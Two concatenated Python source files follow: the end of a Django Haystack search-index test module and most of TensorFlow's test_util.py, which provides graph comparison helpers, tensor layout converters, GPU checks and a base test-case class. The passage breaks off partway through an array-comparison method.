text = indexes.CharField(document=True)
class Meta:
model = AThirdMockModel
class PolymorphicModelSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True)
author = indexes.CharField(model_attr="author")
pub_date = indexes.DateTimeField(model_attr="pub_date")
average_delay = indexes.FloatField(null=True)
def get_model(self):
return AnotherMockModel
def prepare(self, obj):
self.prepared_data = super(PolymorphicModelSearchIndex, self).prepare(obj)
if isinstance(obj, AThirdMockModel):
self.prepared_data["average_delay"] = obj.average_delay
return self.prepared_data
def index_queryset(self, using=None):
return self.get_model().objects.all()
class GhettoAFifthMockModelSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True)
def get_model(self):
return AFifthMockModel
def index_queryset(self, using=None):
# Index everything,
return self.get_model().objects.complete_set()
def read_queryset(self, using=None):
return self.get_model().objects.all()
class ReadQuerySetTestSearchIndex(indexes.SearchIndex, indexes.Indexable):
author = indexes.CharField(model_attr="author", document=True)
def get_model(self):
return AFifthMockModel
def read_queryset(self, using=None):
return self.get_model().objects.complete_set()
class TextReadQuerySetTestSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(model_attr="author", document=True)
def get_model(self):
return AFifthMockModel
def read_queryset(self, using=None):
return self.get_model().objects.complete_set()
class ModelWithManyToManyFieldModelSearchIndex(indexes.ModelSearchIndex):
def get_model(self):
return ManyToManyLeftSideModel
class ModelSearchIndexTestCase(TestCase):
def setUp(self):
super(ModelSearchIndexTestCase, self).setUp()
self.sb = connections["default"].get_backend()
self.bmsi = BasicModelSearchIndex()
self.fmsi = FieldsModelSearchIndex()
self.emsi = ExcludesModelSearchIndex()
self.fwomsi = FieldsWithOverrideModelSearchIndex()
self.yabmsi = YetAnotherBasicModelSearchIndex()
self.m2mmsi = ModelWithManyToManyFieldModelSearchIndex()
def test_basic(self):
self.assertEqual(len(self.bmsi.fields), 4)
self.assertTrue("foo" in self.bmsi.fields)
self.assertTrue(isinstance(self.bmsi.fields["foo"], indexes.CharField))
self.assertEqual(self.bmsi.fields["foo"].null, False)
self.assertEqual(self.bmsi.fields["foo"].index_fieldname, "foo")
self.assertTrue("author" in self.bmsi.fields)
self.assertTrue(isinstance(self.bmsi.fields["author"], indexes.CharField))
self.assertEqual(self.bmsi.fields["author"].null, False)
self.assertTrue("pub_date" in self.bmsi.fields)
self.assertTrue(isinstance(self.bmsi.fields["pub_date"], indexes.DateTimeField))
self.assertTrue(
isinstance(self.bmsi.fields["pub_date"].default, datetime.datetime)
)
self.assertTrue("text" in self.bmsi.fields)
self.assertTrue(isinstance(self.bmsi.fields["text"], indexes.CharField))
self.assertEqual(self.bmsi.fields["text"].document, True)
self.assertEqual(self.bmsi.fields["text"].use_template, True)
def test_fields(self):
self.assertEqual(len(self.fmsi.fields), 3)
self.assertTrue("author" in self.fmsi.fields)
self.assertTrue(isinstance(self.fmsi.fields["author"], indexes.CharField))
self.assertTrue("pub_date" in self.fmsi.fields)
self.assertTrue(isinstance(self.fmsi.fields["pub_date"], indexes.DateTimeField))
self.assertTrue("text" in self.fmsi.fields)
self.assertTrue(isinstance(self.fmsi.fields["text"], indexes.CharField))
def test_excludes(self):
self.assertEqual(len(self.emsi.fields), 2)
self.assertTrue("pub_date" in self.emsi.fields)
self.assertTrue(isinstance(self.emsi.fields["pub_date"], indexes.DateTimeField))
self.assertTrue("text" in self.emsi.fields)
self.assertTrue(isinstance(self.emsi.fields["text"], indexes.CharField))
self.assertNotIn("related_models", self.m2mmsi.fields)
def test_fields_with_override(self):
self.assertEqual(len(self.fwomsi.fields), 3)
self.assertTrue("author" in self.fwomsi.fields)
self.assertTrue(isinstance(self.fwomsi.fields["author"], indexes.CharField))
self.assertTrue("foo" in self.fwomsi.fields)
self.assertTrue(isinstance(self.fwomsi.fields["foo"], indexes.IntegerField))
self.assertTrue("text" in self.fwomsi.fields)
self.assertTrue(isinstance(self.fwomsi.fields["text"], indexes.CharField))
def test_overriding_field_name_with_get_index_fieldname(self):
self.assertTrue(self.fwomsi.fields["foo"].index_fieldname, "foo")
self.assertTrue(self.fwomsi.fields["author"].index_fieldname, "author_bar")
def test_float_integer_fields(self):
self.assertEqual(len(self.yabmsi.fields), 5)
self.assertEqual(
sorted(self.yabmsi.fields.keys()),
["author", "average_delay", "pub_date", "text", "view_count"],
)
self.assertTrue("author" in self.yabmsi.fields)
self.assertTrue(isinstance(self.yabmsi.fields["author"], indexes.CharField))
self.assertEqual(self.yabmsi.fields["author"].null, False)
self.assertTrue("pub_date" in self.yabmsi.fields)
self.assertTrue(
isinstance(self.yabmsi.fields["pub_date"], indexes.DateTimeField)
)
self.assertTrue(
isinstance(self.yabmsi.fields["pub_date"].default, datetime.datetime)
)
self.assertTrue("text" in self.yabmsi.fields)
self.assertTrue(isinstance(self.yabmsi.fields["text"], indexes.CharField))
self.assertEqual(self.yabmsi.fields["text"].document, True)
self.assertEqual(self.yabmsi.fields["text"].use_template, False)
self.assertTrue("view_count" in self.yabmsi.fields)
self.assertTrue(
isinstance(self.yabmsi.fields["view_count"], indexes.IntegerField)
)
self.assertEqual(self.yabmsi.fields["view_count"].null, False)
self.assertEqual(self.yabmsi.fields["view_count"].index_fieldname, "view_count")
self.assertTrue("average_delay" in self.yabmsi.fields)
self.assertTrue(
isinstance(self.yabmsi.fields["average_delay"], indexes.FloatField)
)
self.assertEqual(self.yabmsi.fields["average_delay"].null, False)
self.assertEqual(
self.yabmsi.fields["average_delay"].index_fieldname, "average_delay"
)
class ModelWithManyToManyFieldAndAttributeLookupSearchIndexTestCase(TestCase):
def test_full_prepare(self):
index = ModelWithManyToManyFieldAndAttributeLookupSearchIndex()
left_model = ManyToManyLeftSideModel.objects.create()
right_model_1 = ManyToManyRightSideModel.objects.create(name="Right side 1")
right_model_2 = ManyToManyRightSideModel.objects.create()
left_model.related_models.add(right_model_1)
left_model.related_models.add(right_model_2)
result = index.full_prepare(left_model)
self.assertDictEqual(
result,
{
"django_ct": "core.manytomanyleftsidemodel",
"django_id": "1",
"text": None,
"id": "core.manytomanyleftsidemodel.1",
"related_models": ["Right side 1", "Default name"],
},
)
class PolymorphicModelTestCase(TestCase):
def test_prepare_with_polymorphic(self):
index = PolymorphicModelSearchIndex()
parent_model = AnotherMockModel()
parent_model.author = "Paul"
parent_model.pub_date = datetime.datetime(2018, 5, 23, 13, 57)
parent_model.save()
child_model = AThirdMockModel()
child_model.author = "Paula"
child_model.pub_date = datetime.datetime(2018, 5, 23, 13, 58)
child_model.average_delay = 0.5
child_model.save()
prepared_data = index.prepare(parent_model)
self.assertEqual(len(prepared_data), 7)
self.assertEqual(
sorted(prepared_data.keys()),
[
"author",
"average_delay",
"django_ct",
"django_id",
"id",
"pub_date",
"text",
],
)
self.assertEqual(prepared_data["django_ct"], "core.anothermockmodel")
self.assertEqual(prepared_data["average_delay"], None)
prepared_data = index.prepare(child_model)
self.assertEqual(len(prepared_data), 7)
self.assertEqual(
sorted(prepared_data.keys()),
[
"author",
"average_delay",
"django_ct",
"django_id",
"id",
"pub_date",
"text",
],
)
self.assertEqual(prepared_data["django_ct"], "core.anothermockmodel")
self.assertEqual(prepared_data["average_delay"], 0.5)
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import math
import random
import re
import tempfile
import threading
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util.protobuf import compare
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(len(a_value.bytes_list.value),
len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(
a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
      tester.assertEqual(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, attr_tensor_string_value)):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {
4: [0, 3, 1, 2],
5: [0, 4, 1, 2, 3]
}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {
4: [0, 2, 3, 1],
5: [0, 2, 3, 4, 1]
}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
# TODO(skyewm): remove this eventually
# pylint: disable=protected-access
def _use_c_api_wrapper(fn, use_c_api, *args, **kwargs):
prev_value = ops._USE_C_API
ops._USE_C_API = use_c_api
try:
with ops.Graph().as_default():
fn(*args, **kwargs)
finally:
ops._USE_C_API = prev_value
# pylint: disable=protected-access
# TODO(skyewm): remove this eventually
def disable_c_api(fn):
"""Decorator for disabling the C API on a test.
Note this disables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
return lambda *args, **kwargs: _use_c_api_wrapper(fn, False, *args, **kwargs)
# TODO(skyewm): remove this eventually
def enable_c_api(fn):
"""Decorator for enabling the C API on a test.
Note this enables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
return lambda *args, **kwargs: _use_c_api_wrapper(fn, True, *args, **kwargs)
def run_in_graph_and_eager_modes(__unused__=None, graph=None, config=None,
use_gpu=False, force_gpu=False,
reset_test=True):
"""Runs the test in both graph and eager modes.
Args:
    __unused__: Prevents silently skipping tests.
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
reset_test: If True, tearDown and SetUp the test case again.
Returns:
Returns a decorator that will run the decorated test function
using both a graph and using eager execution.
"""
assert not __unused__, "Add () after run_in_graph_and_eager_modes."
def decorator(f):
"""Test method decorator."""
def decorated(self, **kwargs):
"""Decorated the test method."""
with context.graph_mode():
with self.test_session(graph, config, use_gpu, force_gpu):
f(self, **kwargs)
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self.setUp()
def run_eager_mode():
if force_gpu:
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with context.device(gpu_name):
            f(self, **kwargs)
elif use_gpu:
# TODO(xpan): Support softplacement and gpu by default when available.
f(self, **kwargs)
else:
with context.device("/device:CPU:0"):
f(self, **kwargs)
eager_graph = graph or ops.Graph()
with context.eager_mode():
with eager_graph.as_default():
run_eager_mode()
return decorated
return decorator
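# Hedged usage sketch (the test class and ops below are hypothetical, not from
# this file): the decorator must be *called*, i.e. note the trailing "()",
# otherwise the `__unused__` assert above fires.
#
#   class MyEagerAndGraphTest(TensorFlowTestCase):
#
#     @run_in_graph_and_eager_modes()
#     def testAddition(self):
#       x = constant_op.constant(1.0) + constant_op.constant(2.0)
#       self.assertAllClose(3.0, self.evaluate(x))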
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Args:
cuda_only: limit the search to CUDA gpus.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Returns:
True iff a gpu device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(local_device.physical_device_desc)
>= min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
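# Hedged usage sketch: gating work on GPU availability and placing ops with the
# `device` helper above. The (3, 5) capability pair is illustrative only.
#
#   if is_gpu_available(cuda_only=True, min_cuda_compute_capability=(3, 5)):
#     with device(use_gpu=True):
#       ...  # ops built here are placed on /device:GPU:0
#   else:
#     with device(use_gpu=False):
#       ...  # falls back to /device:CPU:0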
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
ops.get_default_graph().seed = random_seed.DEFAULT_GRAPH_SEED
def tearDown(self):
for thread in self._threads:
self.assertFalse(thread.is_alive(), "A checkedThread did not terminate")
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
    If you call this method multiple times during a test, it will return the
    same folder. However, across different runs the directories will be
    different. This ensures that across different runs tests will not be able
    to pollute each other's environment.
    If you need multiple unique directories within a single test, you should
    use tempfile.mkdtemp as follows:
      tempfile.mkdtemp(dir=self.get_temp_dir())
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
def _AssertProtoEquals(self, a, b):
"""Asserts that a and b are the same proto.
    Uses ProtoEq() first, as it returns correct results
    for floating point attributes, and then uses assertProtoEqual()
    in case of failure, as it provides good error messages.
Args:
a: a proto.
b: another proto.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True)
def assertProtoEquals(self, expected_message_maybe_ascii, message):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
"""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(expected_message_maybe_ascii, expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message)
else:
assert False, ("Can't compare protos of type %s and %s" %
(type(expected_message_maybe_ascii), type(message)))
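  # Hedged usage sketch (message contents are hypothetical): the expected side
  # may be a message of the same type or its text-format (ASCII) rendering.
  #
  #   node_def = node_def_pb2.NodeDef(name="foo", op="Const")
  #   self.assertProtoEquals("name: 'foo' op: 'Const'", node_def)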
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_helper(self, tensors):
if isinstance(tensors, ops.EagerTensor):
return tensors.numpy()
if isinstance(tensors, resource_variable_ops.ResourceVariable):
return tensors.read_value().numpy()
if isinstance(tensors, tuple):
return tuple([self._eval_helper(t) for t in tensors])
elif isinstance(tensors, list):
return [self._eval_helper(t) for t in tensors]
elif isinstance(tensors, dict):
assert not tensors, "Only support empty dict now."
return dict()
else:
raise ValueError("Unsupported type.")
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.in_eager_mode():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
return sess.run(tensors)
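  # Hedged usage sketch (tensor names are hypothetical): `evaluate` lets the
  # same test body run in graph and eager modes -- in eager mode it calls
  # .numpy(), in graph mode it runs the tensors in the default session.
  #
  #   total = math_ops.add(x, y)
  #   self.assertAllClose(expected, self.evaluate(total))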
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method should be used for all functional tests.
    This method behaves differently from session.Session: for performance reasons
`test_session` will by default (if `graph` is None) reuse the same session
across tests. This means you may want to either call the function
`reset_default_graph()` before tests, or if creating an explicit new graph,
pass it here (simply setting it with `as_default()` won't do it), which will
trigger the creation of a new session.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if `use_gpu`
is True, TensorFlow tries to run as many ops on the GPU as possible. If both
    `force_gpu` and `use_gpu` are False, all ops are pinned to the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.test_session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
            self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Returns:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
      elif force_gpu and config.allow_soft_placement:
        # Message.CopyFrom() returns None, so copy into a fresh proto first.
        config_copy = config_pb2.ConfigProto()
        config_copy.CopyFrom(config)
        config = config_copy
        config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.arithmetic_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
if graph is None:
if self._cached_session is None:
self._cached_session = session.Session(
graph=None, config=prepare_config(config))
sess = self._cached_session
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
else:
with session.Session(graph=graph, config=prepare_config(config)) as sess:
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
        self._testcase.failureException: If the thread terminates due to
          an exception.
"""
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
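  # Hedged usage sketch: an exception raised inside the target surfaces as a
  # test failure when join() is called, instead of being silently swallowed.
  #
  #   def _worker(value):
  #     assert value > 0
  #
  #   t = self.checkedThread(target=_worker, args=(1,))
  #   t.start()
  #   t.join()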
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
self.assertTrue(
math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (f1, f2, err, " (%s)" % msg
if msg is not None else ""))
def assertArrayNear(self, farray1, farray2, err):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
"""
self.assertEqual(len(farray1), len(farray2))
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
